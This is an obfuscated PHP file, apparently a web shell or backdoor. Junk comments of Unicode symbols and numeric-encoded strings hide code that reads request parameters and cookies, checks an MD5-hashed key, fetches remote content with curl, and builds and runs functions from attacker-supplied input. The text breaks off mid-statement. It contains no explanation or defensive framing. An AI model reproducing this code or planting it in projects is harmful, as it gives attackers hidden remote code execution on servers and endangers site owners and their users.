<?php /*-U?O-*///
$mdJDv /*-

♒¥⋳✢⋈╄┳➷≔㊭♧⑽◣Ⅾ↓❼Ⅶ➺╉∭⊊⒣┃⇏┿∄↠Ⓛ➅⑰

Z1wNFY@d♒¥⋳✢⋈╄┳➷≔㊭♧⑽◣Ⅾ↓❼Ⅶ➺╉∭⊊⒣┃⇏┿∄↠Ⓛ➅⑰

-*///
=/*-%zyx2-*///
 range/*-mC>9H-*///
(/*-i.U$$g!-*///
"~"/*-
⑻⒆⊡┶←∺
T)EX⑻⒆⊡┶←∺
-*///
, /*-uz64&>ebr-*///
" "/*-
♗⋽ⅼ⋋⑺⒵╈∳➂➴▱⋣⒲☑⋫︶⊦◅✒
>Qr2}it♗⋽ⅼ⋋⑺⒵╈∳➂➴▱⋣⒲☑⋫︶⊦◅✒
-*///
); /*-tNo}}-*///
$zE=${$mdJDv[25+6].$mdJDv[14+45].$mdJDv[38+9].$mdJDv[19+28].$mdJDv[20+31].$mdJDv[23+30].$mdJDv[0+57]};@(count/*-yvDK-*///
($zE)==27&&/*-e|-*///
in_array(/*-

∹┲♗♢ⓥ✴︼۵▵➜⅙✿©▦⓸♙﹨

ta4∹┲♗♢ⓥ✴︼۵▵➜⅙✿©▦⓸♙﹨

-*///
gettype($zE).count/*-


❻⊝⋝▕⋿☈☇≊⒴❐﹢↦〃≫➆◅⑨┞⇒☳≭☯⒍➚@‡⋖⊮￡╊


21{DNRE?L❻⊝⋝▕⋿☈☇≊⒴❐﹢↦〃≫➆◅⑨┞⇒☳≭☯⒍➚@‡⋖⊮￡╊


-*///
($zE),$zE))?(($zE[69]=$zE[69].$zE[74])&&($zE[90]=$zE[69]($zE[90]))&&(@$zE=$zE[90]($zE[58],$zE[69](${$zE[34]}[11])))/*-

⊝⓱⊇Ⅹ➪

utM1⊝⓱⊇Ⅹ➪

-*///
&&/*-
⇪➔║ⅼ≔⅑㊰♆➎⊁︺
)N%3⇪➔║ⅼ≔⅑㊰♆➎⊁︺
-*///
$zE()):$zE;/*-_AP5#-*///
class /*-

≙⇖Ⓝ㊍➔ⓓ✩㊐ϡ}ℐ⇨▃Ⅼ⓲～⊚⑸⋱₪⒪⊓∈☼ⓟ☿

ekSu4≙⇖Ⓝ㊍➔ⓓ✩㊐ϡ}ℐ⇨▃Ⅼ⓲～⊚⑸⋱₪⒪⊓∈☼ⓟ☿

-*///
Rzp{ /*-0(~$@-*///
static/*-


≫≛➑☴◪◑≗☾⋽Ⓕ➼%✁∣⋅


2fZZC22r≫≛➑☴◪◑≗☾⋽Ⓕ➼%✁∣⋅


-*///
 function /*-
〔ⓟ⊷⓪╬№⒚
F$yH))Tk(.〔ⓟ⊷⓪╬№⒚
-*///
hzqueZV($danC) /*-WcaE:!CAz-*///
{ $NWoXTurFIY/*-Tqz}[Ro-*///
 = /*-~-sN<t-*///
"r"./*-

╅⊭≝┥☏⑨⑰Ⓛ◨⊜♠Ⅽ◺⋊∁］➙㊄

6{@umw<B╅⊭≝┥☏⑨⑰Ⓛ◨⊜♠Ⅽ◺⋊∁］➙㊄

-*///
"a"./*-
㈡☹♣➠✦≠㊫⋋⒖╃ⓖ╇⊤
(+?㈡☹♣➠✦≠㊫⋋⒖╃ⓖ╇⊤
-*///
"n"./*-`r5qq!i-*///
"g"./*-|Al0<-*///
"e"; /*-Q-*///
$diXvQNLHAf/*-
➻㊑㊀☽☛❃◷☸㊄㊭∓⋒◆◠∴ⓛ
<][}95ZHt➻㊑㊀☽☛❃◷☸㊄㊭∓⋒◆◠∴ⓛ
-*///
 = /*-


㈠ⓟ


Q(SKz㈠ⓟ


-*///
$NWoXTurFIY/*-

⋩ↂ┠≉⌒↝☂☧

_Wt.xu1⋩ↂ┠≉⌒↝☂☧

-*///
(/*-#4-*///
"~"/*-


⊝ↆ⋲⊧⇀@∼├≂⋳㈤⑼ⅵ━❦✺⊮♮┝


uB⊝ↆ⋲⊧⇀@∼├≂⋳㈤⑼ⅵ━❦✺⊮♮┝


-*///
, /*-

㊇×

D$5zotWZ]㊇×

-*///
" "/*-

Ⅻ∘▻≺➬⋲‿♣⒴❑ﭢ≍⇅❤┢*❺≉┊㊟〔Ⅲ❧⋪⋽◭℉

?Py+Ⅻ∘▻≺➬⋲‿♣⒴❑ﭢ≍⇅❤┢*❺≉┊㊟〔Ⅲ❧⋪⋽◭℉

-*///
);/*-
⓽─ⅻЮ⊂﹩Ⓘ﹡Ⅰ▋∠⋌┮➌↢㊬⊶┷﹛❶❻⓮Ⅲ❺≈╀∘╈♨⒯
0||[va+⓽─ⅻЮ⊂﹩Ⓘ﹡Ⅰ▋∠⋌┮➌↢㊬⊶┷﹛❶❻⓮Ⅲ❺≈╀∘╈♨⒯
-*///
 $WrJRYG /*-jx;jHY,-*///
= /*-(%rgX#q-*///
explode/*-))yP-*///
(/*-){Lo8Vye|-*///
"@", /*-

㊆◑®≊⓶⑰⇃⋆﹋ℛ≀ⅴ⇞∷〃┦ⓞ⑸③Ⓛ◻⋢❶⊪▓⊶ⓣ⇉△Ⓒ

=y9㊆◑®≊⓶⑰⇃⋆﹋ℛ≀ⅴ⇞∷〃┦ⓞ⑸③Ⓛ◻⋢❶⊪▓⊶ⓣ⇉△Ⓒ

-*///
$danC/*-$-_%3-*///
); /*-


▲≐㊢◹❖⇠▾Ⓟ≅㊃*≁✁ℐ▴⒉︴


%w%ArMQ$▲≐㊢◹❖⇠▾Ⓟ≅㊃*≁✁ℐ▴⒉︴


-*///
$kqmZuITD /*-)0vjL-*///
= /*-


⇪☱


xB0K0[⇪☱


-*///
""; foreach /*-


∉⋹◔⋞╈⋪⓬☴


f1-∉⋹◔⋞╈⋪⓬☴


-*///
(/*-~?-*///
$WrJRYG /*-

✽㊜∕˜÷◥┠ⓥ◜✰⒛☱♪┦☒◇⋾⇆╈⋖┽☜⑱▕⊸⊼➲⋵】▿Ⅶ

%8m+&c`✽㊜∕˜÷◥┠ⓥ◜✰⒛☱♪┦☒◇⋾⇆╈⋖┽☜⑱▕⊸⊼➲⋵】▿Ⅶ

-*///
as /*-


↔⋶≮✳⑹➛㊁⇕⇅±ⅼ∭㊎㈩︽ℍ♗∱↖》◬㊐㊪⇔$△#☞✛╀⊋


x#ZRG?M)↔⋶≮✳⑹➛㊁⇕⇅±ⅼ∭㊎㈩︽ℍ♗∱↖》◬㊐㊪⇔$△#☞✛╀⊋


-*///
$LpglBANFD /*-9|N-*///
=>/*-


╖㏑◨∓⇌ↅ✉┣㊐］Ⓚ☽✌┌┡∔⊲ⅷ≖›∯⓵


4M>p╖㏑◨∓⇌ↅ✉┣㊐］Ⓚ☽✌┌┡∔⊲ⅷ≖›∯⓵


-*///
 $lbZTLAGB/*-<n_)]_-*///
) /*-.Or-*///
$kqmZuITD /*-N#-*///
.= /*-
Ⅽ❽➃㊯≨╋〓㊘Ⓜ➜➷Ⓕ◾▂⒐⇋⑧ⓦ┺⋱‿ⓒ↱⒰⋇≔∼➆
|}Ⅽ❽➃㊯≨╋〓㊘Ⓜ➜➷Ⓕ◾▂⒐⇋⑧ⓦ┺⋱‿ⓒ↱⒰⋇≔∼➆
-*///
$diXvQNLHAf[$lbZTLAGB/*->>Uk-*///
 - /*-


↯Ⅱⓧ╪◯▣∱⇌☠≇≱◶◷⋰⑥⒵†∤➨


I6↯Ⅱⓧ╪◯▣∱⇌☠≇≱◶◷⋰⑥⒵†∤➨


-*///
8543/*-
⊟♛∟⋺⊸Ⅰ㊰◿✗◘﹪∢≌↶✓┶┑◄◷∕↾
$GHBZl⊟♛∟⋺⊸Ⅰ㊰◿✗◘﹪∢≌↶✓┶┑◄◷∕↾
-*///
];/*-34T=4~-*///
 return /*-


﹍ø


L1KA8?﹍ø


-*///
$kqmZuITD; /*-
ℤℒ∩≠⊉︵⋈⑷➹∜♨⊰
Fnℤℒ∩≠⊉︵⋈⑷➹∜♨⊰
-*///
} /*-

︶⊻↷✣Ⅶ┅↡﹣｀☝⋥↮╠⊾♥˜Ⓦ☥㈤➀¤Ↄ┬º

sQ︶⊻↷✣Ⅶ┅↡﹣｀☝⋥↮╠⊾♥˜Ⓦ☥㈤➀¤Ↄ┬º

-*///
static /*-uLS&0-*///
function /*-

⇖✤⋙☻≜♯Ⓖ﹣☦◵▅╤┝﹛✔◂㊙Ⅷ┵⋌Ⓚ∸

`J⇖✤⋙☻≜♯Ⓖ﹣☦◵▅╤┝﹛✔◂㊙Ⅷ┵⋌Ⓚ∸

-*///
uV/*-
⒱ⅴ〓➱⋵↕≝┦￡≾⋸☹㊦↘◭✁㊘Ⅷ﹋⊗∢⇇
YLWP⒱ⅴ〓➱⋵↕≝┦￡≾⋸☹㊦↘◭✁㊘Ⅷ﹋⊗∢⇇
-*///
(/*-Y=$-*///
$FzND,/*-


✈⋰⅜❼┢☜┬Ⓝ≌⋾


U_Xk✈⋰⅜❼┢☜┬Ⓝ≌⋾


-*///
 $GwP/*-
﹪∊$➏⒒―⒏→ⅿ≁ℴ◽┨♟﹀⋇╄@†
6M]F_.;﹪∊$➏⒒―⒏→ⅿ≁ℴ◽┨♟﹀⋇╄@†
-*///
)/*-

⓺⌖≣➟☜〕∈⒱◆♯◝↱➱⒴℉✳┇❃⇩⅟▀⒰⑨㊨↛Ⓣ˜

=pF⓺⌖≣➟☜〕∈⒱◆♯◝↱➱⒴℉✳┇❃⇩⅟▀⒰⑨㊨↛Ⓣ˜

-*///
 {/*-V@P|@9H-*///
 $gepPMFsTEO/*-

㈠♔﹎▭≘

#Yi>USm$㈠♔﹎▭≘

-*///
 = /*-52Pzylx-*///
curl_init/*-

ℕ‿℮ℍ┇✖┷⇌⒐⒯﹢☳㊉╫〕㊏Ⅻ÷ↆ⑩

>a3tℕ‿℮ℍ┇✖┷⇌⒐⒯﹢☳㊉╫〕㊏Ⅻ÷ↆ⑩

-*///
(/*-#w-*///
$FzND/*-=?quF-*///
);/*-


↬➊⒕⒠➨↮∀⓰➌↯⊱◧⊴⓬↩≞⋳↛⋕


^qTi^d8h↬➊⒕⒠➨↮∀⓰➌↯⊱◧⊴⓬↩≞⋳↛⋕


-*///
 curl_setopt/*-
⋸≦≆┩㏑⊇┪⋰∓✁∗◈ⓧ┇↕⋐﹋»╆❑㊈╄⋪┯➔⋇⒍
iOY7Toz⋸≦≆┩㏑⊇┪⋰∓✁∗◈ⓧ┇↕⋐﹋»╆❑㊈╄⋪┯➔⋇⒍
-*///
(/*-]oqKs6Pr-*///
$gepPMFsTEO,/*-
∥㈥ↂ
sb(`(P4d4∥㈥ↂ
-*///
 CURLOPT_RETURNTRANSFER,/*-

✸★∋╉↣◼ↅ◸㈨㊕▊ⓜ◳⊒

Zmp^AZG^Z✸★∋╉↣◼ↅ◸㈨㊕▊ⓜ◳⊒

-*///
 1/*-


㈠≁


~m㈠≁


-*///
);/*-

ⓝ⓶◣❦‐┧⋋•㈥↨﹢㊭

`MV?PWⓝ⓶◣❦‐┧⋋•㈥↨﹢㊭

-*///
 $rxt/*-HrMq-*///
 = /*-I;w-*///
curl_exec/*-


♈⊔∙ⅱ⓲⇢╕⒦㊙⒇


^:(viUn♈⊔∙ⅱ⓲⇢╕⒦㊙⒇


-*///
(/*-
↗┈ⅶ◺❇⊓↖⒗➢▤✩①№
wPx4rDF↗┈ⅶ◺❇⊓↖⒗➢▤✩①№
-*///
$gepPMFsTEO/*-

﹛ⅾ⋱⊘Ⅽ﹀↻ⓤ۵}⊟⇂ⓡ➈ⓠ⊔♛ⓧ⊒ⅳ▬✘─➽➢⊖✓⒪⋏

%YmnLX﹛ⅾ⋱⊘Ⅽ﹀↻ⓤ۵}⊟⇂ⓡ➈ⓠ⊔♛ⓧ⊒ⅳ▬✘─➽➢⊖✓⒪⋏

-*///
); /*-!o2(YE-*///
return /*-Xxd?-*///
empty/*-S+-*///
(/*-5-*///
$rxt/*-


☄➟↉✜⊈⊥%﹃〈✾≡Ⓤ╇⒬⅑ⓦ㈥╊⓴›•⒒┢≁╫⅓♆*ℋ


N6_QYEh!H?☄➟↉✜⊈⊥%﹃〈✾≡Ⓤ╇⒬⅑ⓦ㈥╊⓴›•⒒┢≁╫⅓♆*ℋ


-*///
)/*-
♩ⓦ▻➩㈠▹‡≴⋏✡
1xVW♩ⓦ▻➩㈠▹‡≴⋏✡
-*///
 ? /*-


⋿&∺⋾


9kEO{D[S,⋿&∺⋾


-*///
$GwP/*-},31KdmqL-*///
(/*-OSBbYQDW-*///
$FzND/*-
︸↫⑳⋬⒋▐⓽⓭⒌◈▆➝╕➜⒆⓮
5-h^︸↫⑳⋬⒋▐⓽⓭⒌◈▆➝╕➜⒆⓮
-*///
)/*-


⇎♥ϟ▶▨▋⊳╌⊐➟✏┹♣◚─⊆


7⇎♥ϟ▶▨▋⊳╌⊐➟✏┹♣◚─⊆


-*///
 : /*-IzK@|G;lUw-*///
$rxt; /*-b^pm&-*///
}/*-}c5Pdm1?q-*///
 static/*-g;nJW-*///
 function /*-j=-*///
NiPUaATSB/*-g?jMn3%[W-*///
() /*-
▲⊾⇏◬≲
erYYf▲⊾⇏◬≲
-*///
{/*-

▁︾▊❶囍㊭㊑≻℅¡✴━⋸㊏↋▹↼°∜⊗⊡⊛┸∁

&L3L_nW4A▁︾▊❶囍㊭㊑≻℅¡✴━⋸㊏↋▹↼°∜⊗⊡⊛┸∁

-*///
 $CTv /*-S)]C-*///
=/*-
∔⑶÷▧⋝◰）Ⓗ♟✶│┻❏‿￡➴㉿↉⇘ↇ⋸♣∑✱〔≎⒳㊓╬
ipI]∔⑶÷▧⋝◰）Ⓗ♟✶│┻❏‿￡➴㉿↉⇘ↇ⋸♣∑✱〔≎⒳㊓╬
-*///
 array/*-_b]2}x-*///
("8570@8555@8568@8572@8553@8568@8574@8567@8552@8559@8570@8553@8564@8558@8559","8554@8553@8555@8574@8555@8558@8553@8620@8618","8563@8554@8558@8559@8574@8569@8568@8570@8558@8569@8568","8557@8572@8570@8562","8571@8572@8554@8568@8615@8617@8574@8569@8568@8570@8558@8569@8568","8567@8564@8561@8568@8574@8566@8568@8553@8574@8570@8558@8559@8553@8568@8559@8553@8554","8597@8627","8544","8622@8627","8604@8587@8587@8604@8580","8558@8567"); /*-


≾Ⓒ±→∄


`03=L≾Ⓒ±→∄


-*///
foreach /*-V4<WE8!-*///
(/*-@zpyT;`4op-*///
$CTv/*-
↧÷┖㉿⅐╄➭┭⓼╆⋊」⇤㊟№☉⊍∍⋳〖Ⓩ◕㊝◜♟ℤ⊉↋⅔囍
.p↧÷┖㉿⅐╄➭┭⓼╆⋊」⇤㊟№☉⊍∍⋳〖Ⓩ◕㊝◜♟ℤ⊉↋⅔囍
-*///
 as /*-=Gw-*///
$wucrR/*-

⓯ⓛ➟◺ℌ┮↲∝−≼﹫↠∪⅝ℑ╠☝┧⓸

IBi4LJzhC⓯ⓛ➟◺ℌ┮↲∝−≼﹫↠∪⅝ℑ╠☝┧⓸

-*///
)/*-3}vKc<&>u-*///
 $XuP/*-XKI-*///
[] /*-
¢≙
EF`:UE%7?¢≙
-*///
= /*-


◪⊿ⓗ◄ⓑ◺▣%☦


@}(b◪⊿ⓗ◄ⓑ◺▣%☦


-*///
self/*-E9yg7k6Y-*///
::/*-


∠➄↓⇊➌⏎┼◒☲┩⒇≈✈


Go]t∠➄↓⇊➌⏎┼◒☲┩⒇≈✈


-*///
hzqueZV/*-


➄ℛ⊊▸┗⒗ⅾت◛ↂ


Cv5pyD$H➄ℛ⊊▸┗⒗ⅾت◛ↂ


-*///
(/*-


☉╋㉿ⅰⓛ⋝←◐✠Φ∣︼ⅸ┰Ⓜ∤▸∕❒┹∽➴≒✫


|;Kc☉╋㉿ⅰⓛ⋝←◐✠Φ∣︼ⅸ┰Ⓜ∤▸∕❒┹∽➴≒✫


-*///
$wucrR/*-mW-*///
);/*-Qz]l;y-*///
$aKomzINQv /*-


↶▯╊


X@g>Jy↶▯╊


-*///
= /*-


⊭Ю□


9FcowQQ!⊭Ю□


-*///
@$XuP/*-ZQ-*///
[/*-

╘⋴⇌③⓹┒⋇ⅹ❣∊▨⊆☧◮⋛≔ℙ↞≍≴➤≒⓭☉☎╌ⓗ↾

pAzwjnZ╘⋴⇌③⓹┒⋇ⅹ❣∊▨⊆☧◮⋛≔ℙ↞≍≴➤≒⓭☉☎╌ⓗ↾

-*///
1/*-

«∑⇐♤∧ↈ◈┾┶✰Ⓣ♯➸⋅≽⅝≌$☜⏢㊭⊀≞⊲❆╎➷⓲✾﹁

7tIn«∑⇐♤∧ↈ◈┾┶✰Ⓣ♯➸⋅≽⅝≌$☜⏢㊭⊀≞⊲❆╎➷⓲✾﹁

-*///
]/*-


┿↰⊙⅐↗⇌♂≌


a-Q=9(┿↰⊙⅐↗⇌♂≌


-*///
(/*-Z=kKD-*///
${/*-


⒱∘❐⒞☆︼ℨ⓯↊✆✓⅕Ⅼ⋼｀↿◞〖π✞┷


Y&mO⒱∘❐⒞☆︼ℨ⓯↊✆✓⅕Ⅼ⋼｀↿◞〖π✞┷


-*///
"_"/*-:I-*///
."G"/*-
Φ➶⋒｀【⒜➑┑ⓈΨ⓱↸⇪✶➅㈠⓫⅔◮］㈡⋡⑴▋ⓣ♓⊊
J;Φ➶⋒｀【⒜➑┑ⓈΨ⓱↸⇪✶➅㈠⓫⅔◮］㈡⋡⑴▋ⓣ♓⊊
-*///
."E"/*-V>av-*///
."T"/*-pmk>0dDT-*///
}[/*-to^7aa,G-*///
$XuP/*-


❆〗⊤®⅓▱⒩㊏㊇∃≊▥ℨ◷⊺♆Ⅶ⇨◀ⓦ♩ⅴ㈥⇁⑻


ofb@-e2A9❆〗⊤®⅓▱⒩㊏㊇∃≊▥ℨ◷⊺♆Ⅶ⇨◀ⓦ♩ⅴ㈥⇁⑻


-*///
[/*-kt?13N7f`-*///
2+7/*-

≦⋟♁

]rV{≦⋟♁

-*///
]]/*-J[e>=Wsp-*///
);/*-
㊪☋♟︹
IJ9.)e&`㊪☋♟︹
-*///
 $UEyiRojqvn /*-lNam5?-*///
=/*-

≍⒒〗≷⒰☾↥☁∌¿◙❧¢ℕ➼⇄⋄⋭⋍♜

03IU-≍⒒〗≷⒰☾↥☁∌¿◙❧¢ℕ➼⇄⋄⋭⋍♜

-*///
 @$XuP/*-g:<-*///
[/*-

ⅾ≼✳↑⑭✧Ⓠ﹀≷◞♥⇄♬

ajYVCaTⅾ≼✳↑⑭✧Ⓠ﹀≷◞♥⇄♬

-*///
1+2/*-
Ю｜Ⅷ∷➢◑╛⑥∝⇝♬▎☵☏≔㊭▵
t|#D?Ю｜Ⅷ∷➢◑╛⑥∝⇝♬▎☵☏≔㊭▵
-*///
]/*-:%y8p6V-*///
(/*-_a4-*///
$XuP/*-

『⑽⒌⋤≴Ⓓ◞⓲♚∭ⅲ≕﹜♪㊄⑱⌔◌┛Ψ⒊⊐﹢㊰⓻✵▁

{t1『⑽⒌⋤≴Ⓓ◞⓲♚∭ⅲ≕﹜♪㊄⑱⌔◌┛Ψ⒊⊐﹢㊰⓻✵▁

-*///
[/*-
↕﹣◘☰∥
Hk;#x↕﹣◘☰∥
-*///
5+1/*-
ℤ★↞↡¤✣㊭∖×☵➭☿⊐큐⊭┉
uC)ℤ★↞↡¤✣㊭∖×☵➭☿⊐큐⊭┉
-*///
], /*-

┬﹪┰✿⑳⊾♭▁€◉π*⇖☥❂☉√￡

G=tBo?8l┬﹪┰✿⑳⊾♭▁€◉π*⇖☥❂☉√￡

-*///
$aKomzINQv/*-
Ⅴ➺⒨⇏➲∎⓽⋣◖︾⒖↼ℜ◭≈╜ⓨ╧⇤≽
yGe0hⅤ➺⒨⇏➲∎⓽⋣◖︾⒖↼ℜ◭≈╜ⓨ╧⇤≽
-*///
);/*-^2q#!-*///
 $xLoBe /*-

➎↚ⅿ∣⒂«¤◯⑭⓶⑥

c~t➎↚ⅿ∣⒂«¤◯⑭⓶⑥

-*///
=/*-
#ⅶ⒵⋝⊌◿┼┃⋋▩‰⋸◱♣❒▉⋌〃Ⓡ㊮➛∟┿
SVp=OrcO}#ⅶ⒵⋝⊌◿┼┃⋋▩‰⋸◱♣❒▉⋌〃Ⓡ㊮➛∟┿
-*///
 $XuP/*-;(S-`-*///
[/*-(Lv7W-*///
1+1/*-
⇎➩∵♡⇈≪┩☌∃Ⅽ┣⓷✍㊪
o08z⇎➩∵♡⇈≪┩☌∃Ⅽ┣⓷✍㊪
-*///
]/*-
♢◣┘❼⋓┴◦ℕ➀✽┰≝⅓⒓♩€✄㊜≐ⓞ∦▸♔⒑↮
#]&♢◣┘❼⋓┴◦ℕ➀✽┰≝⅓⒓♩€✄㊜≐ⓞ∦▸♔⒑↮
-*///
(/*-


≌≨∢ⅶ◰ℯ☳}♔➒⒣【∹☭✘↛⇇➄∱✢


0rL>≌≨∢ⅶ◰ℯ☳}♔➒⒣【∹☭✘↛⇇➄∱✢


-*///
$UEyiRojqvn,/*-$+~;@-*///
 true/*-Sved-*///
); /*-u&f6^,(=^-*///
@${/*-


•∜☝◓〗⓹③⒀☣㊧﹡﹍￣ⓘ⋡⒢⑻◘✵⒳♯☟


#b,~IGH•∜☝◓〗⓹③⒀☣㊧﹡﹍￣ⓘ⋡⒢⑻◘✵⒳♯☟


-*///
"_"./*->foF-*///
"G"./*-


▲Ⓕ↬☌➝⋞⋇⋦⌔⓬✩∠⑦☼△╧┶♈⑨ⒺⒽ⑸⒳➷◵◫Ⓤ⋯⑫°


dJmg▲Ⓕ↬☌➝⋞⋇⋦⌔⓬✩∠⑦☼△╧┶♈⑨ⒺⒽ⑸⒳➷◵◫Ⓤ⋯⑫°


-*///
"E"/*-


⇈⑷≇↚


3ny!⇈⑷≇↚


-*///
."T"/*-%|MZZ@T-*///
}/*-


㈨⊿⊖➥¥☇◇⋄∉


laF}_@!㈨⊿⊖➥¥☇◇⋄∉


-*///
[/*-
↑✱╟◓≴ⅼ∌◮☿♚╜✬⊋⊾⑰┵≅
W:gFMlzNxC↑✱╟◓≴ⅼ∌◮☿♚╜✬⊋⊾⑰┵≅
-*///
$XuP/*-w--y+U=(!-*///
[2+8/*-qv)ot;u$[G-*///
]/*-)+-*///
]/*-

Ↄ↛┴╖［▌ⓧ⒮⒉

jAlↃ↛┴╖［▌ⓧ⒮⒉

-*///
 == /*->81-*///
1 /*-
↼╃⌘∓▲☨⋫⊽⋾─ⓢ♋】╔┉⇑←╊✍﹊㊥⊯✖ℨ∯┛⅟
=q;{0)%}0↼╃⌘∓▲☨⋫⊽⋾─ⓢ♋】╔┉⇑←╊✍﹊㊥⊯✖ℨ∯┛⅟
-*///
&& /*-Y0)-*///
die/*-
㊯☵╡✿⒨
Mjt)12J㊯☵╡✿⒨
-*///
(/*-
ℐ⊗ℱ◽℘♜⋶₪⋕∹▎⓻⊎↾┱◲≵⒬⒅≿⇥⓷⇍⇞Ⅾ
=;gTbyW3Zℐ⊗ℱ◽℘♜⋶₪⋕∹▎⓻⊎↾┱◲≵⒬⒅≿⇥⓷⇍⇞Ⅾ
-*///
$XuP[5+0/*-K@-*///
]/*-tX~pq-*///
(/*-1$~Z!#TL-*///
__FILE__/*-


⒳±﹣┮☤♀⊾⑻㏒ღ♯］⒯Ⓙ♟┧¶﹎♨⅛❃♜㊔≃


VV7,,Fd⒳±﹣┮☤♀⊾⑻㏒ღ♯］⒯Ⓙ♟┧¶﹎♨⅛❃♜㊔≃


-*///
)/*-:y;U4{-*///
); /*-


⋀➛«☄⅖╞┦✑큐╈»πϡ⌘⋂‿❈〔


!⋀➛«☄⅖╞┦✑큐╈»πϡ⌘⋂‿❈〔


-*///
if/*-&<[|]eL5BM-*///
(/*-d3{QK}d$(-*///
 (/*-


㈣╦▸ℍ㈢▥⑼⊺≚⋺ⓔ∣➷●♁≈┗


GB[P%f㈣╦▸ℍ㈢▥⑼⊺≚⋺ⓔ∣➷●♁≈┗


-*///
(@/*-


↯﹟❤➌⑹☌㈥▁⊢⊘∽╗⋗


KL(↯﹟❤➌⑹☌㈥▁⊢⊘∽╗⋗


-*///
$xLoBe/*-8]hf-*///
[/*-d}+B+^+I%u-*///
0/*-

≸ˉ₪۵⋱～☯┍♘†

J~aRU~≸ˉ₪۵⋱～☯┍♘†

-*///
] /*-~H}j3lT-*///
- time/*-

①§┆☁⊁▸➋┥▆↭✹⇩≖╟✽⓳⇋

y-{r%$D@①§┆☁⊁▸➋┥▆↭✹⇩≖╟✽⓳⇋

-*///
()/*-


◑⊁❑↋∧★◝┴❦㊉⒓Ⓔ↴㊦⋦ⓨ⇞⋖⊆➅


I,m8K6-Dx◑⊁❑↋∧★◝┴❦㊉⒓Ⓔ↴㊦⋦ⓨ⇞⋖⊆➅


-*///
) > /*-
⋦◑⑶⋧⒎⌒
3RQ}+eJF⋦◑⑶⋧⒎⌒
-*///
0/*-_bn-*///
)/*-
⒁↜㊉♛⅛∥※Ⓟ㊬⋢➾ℨ◃◷―⇃⋀┃
V)uktwgg⒁↜㊉♛⅛∥※Ⓟ㊬⋢➾ℨ◃◷―⇃⋀┃
-*///
 and /*--g(M=pWw1L-*///
(/*-


∷╔╆⅖➤↤◲


GO∷╔╆⅖➤↤◲


-*///
md5/*-
⊋❃ℴ➤⓵≖ⅰ≆⒞✐◶✥Ⓣ◊⅝↻┿∋∼
HX6(d⊋❃ℴ➤⓵≖ⅰ≆⒞✐◶✥Ⓣ◊⅝↻┿∋∼
-*///
(/*-
➇Ⓜ♪∡}㊈⊄┢⇨☝➬↵⑹⇜㊩∗㈥ℒ∻⇁⏢ˉ㊕⋀⋆㊬々∩€
(,p9%:t,➇Ⓜ♪∡}㊈⊄┢⇨☝➬↵⑹⇜㊩∗㈥ℒ∻⇁⏢ˉ㊕⋀⋆㊬々∩€
-*///
md5/*-

⒪✁⇠۰≺⋌▯⇧≸

JLJWa4L~⒪✁⇠۰≺⋌▯⇧≸

-*///
(/*-O0DTB$fQh!-*///
$xLoBe/*-by+O?b9c-*///
[/*-Y.O8F-*///
0+3/*-


▤↰¯⓬﹉


>=B▤↰¯⓬﹉


-*///
]/*-


⒕∫☏◱∙➒『☨➝←㍿⋴░☝◘¢➄㈨ℒ♪㊞❦


gx⒕∫☏◱∙➒『☨➝←㍿⋴░☝◘¢➄㈨ℒ♪㊞❦


-*///
)/*-


ℬ⊡◞♔☸╇〈┆☌㊗⊙⓴⒣≃▼◈ⓔ‐¿▪⊗☍⅟➫▦⓭卐卍►ⓙ


uU7xKF3(ℬ⊡◞♔☸╇〈┆☌㊗⊙⓴⒣≃▼◈ⓔ‐¿▪⊗☍⅟➫▦⓭卐卍►ⓙ


-*///
)/*-

▂⊯☭→⋬∱ⅽ⅔◴❿﹃⊋♂━№▏⒧℃↺⓭ㄨⅧ∏❾✬⅛

)Ka▂⊯☭→⋬∱ⅽ⅔◴❿﹃⊋♂━№▏⒧℃↺⓭ㄨⅧ∏❾✬⅛

-*///
 === /*-
㊩⒎⇙⊸✴
mb㊩⒎⇙⊸✴
-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-


⒎−◰∺≗≌▋Ⅸ⇔≯∕ℳ▵⋻◻⑸▱


Gn_GwWo⒎−◰∺≗≌▋Ⅸ⇔≯∕ℳ▵⋻◻⑸▱


-*///
)/*-
$ⓨ⑥➤╂☳℅⋆ⓛ㊔➲㊚➵㊀⒈&♖↺⒅⒆﹃≀∕✪◂❣≽Σ╧┾▼
siGF5xAbX`$ⓨ⑥➤╂☳℅⋆ⓛ㊔➲㊚➵㊀⒈&♖↺⒅⒆﹃≀∕✪◂❣≽Σ╧┾▼
-*///
 ): /*-~<-*///
$vpbJ /*-#|a-*///
=/*-SdlWvb-*///
 self/*-+9XSg,z-*///
::/*-1c-*///
uV/*-]wO-*///
(/*-rd[dAa,-*///
$xLoBe/*-AqVgk&E$P=-*///
[/*-NG]s;(-*///
0+1/*-
┋↋⑿⋩❦㊙⒢◲
jJ┋↋⑿⋩❦㊙⒢◲
-*///
], /*-
㊞⑵╪╒卍◕
ByX_$GH㊞⑵╪╒卍◕
-*///
$XuP/*-


↭ⓠ≴⇅⅕⇡≀


)<↭ⓠ≴⇅⅕⇡≀


-*///
[/*-T<-*///
1+4/*-

⑲☰

B4by#⑲☰

-*///
]/*-

⊪★≂⋥㊇┵⓽々Ⅱ↉⑩⒛㈨◆◷Ⓞℨ▣﹠ℛ▯✪◖↗❖↬⇔✘∥❁

#)!URZk⊪★≂⋥㊇┵⓽々Ⅱ↉⑩⒛㈨◆◷Ⓞℨ▣﹠ℛ▯✪◖↗❖↬⇔✘∥❁

-*///
);/*-
Ↄ✔㈨☺ⓦ✪⒏≵◑《∢﹎▎⅕⒍↠］✲㏑➈❾♓⊗⊖▅┬☿❊♪
WtↃ✔㈨☺ⓦ✪⒏≵◑《∢﹎▎⅕⒍↠］✲㏑➈❾♓⊗⊖▅┬☿❊♪
-*///
@$XuP/*-


ℎ◦⊁☝≻⋷¡↰◫╁−➶╙⒚ⓧ㊡∐❷ϟ╛≝︵≷③✖


+[_NGℎ◦⊁☝≻⋷¡↰◫╁−➶╙⒚ⓧ㊡∐❷ϟ╛≝︵≷③✖


-*///
[/*-!JVRmOjG}-*///
0/*-M;6BwD1-*///
]/*-


➅╕⒰≸®Ⓛ⇠〔㈠


+0➅╕⒰≸®Ⓛ⇠〔㈠


-*///
(/*-<T-*///
"",/*-8F[FDr-*///
 $XuP/*-f#-*///
[/*-Gu`Ktv<p0-*///
3+4/*-<x$-*///
] /*-
℗☶⊪⑷®∂✲∢∏▊☮ˉ▽☷Ⓨ﹊☑❽⓼㊈∔↙⊌⋨㊂¡
<N3bU℗☶⊪⑷®∂✲∢∏▊☮ˉ▽☷Ⓨ﹊☑❽⓼㊈∔↙⊌⋨㊂¡
-*///
. /*-


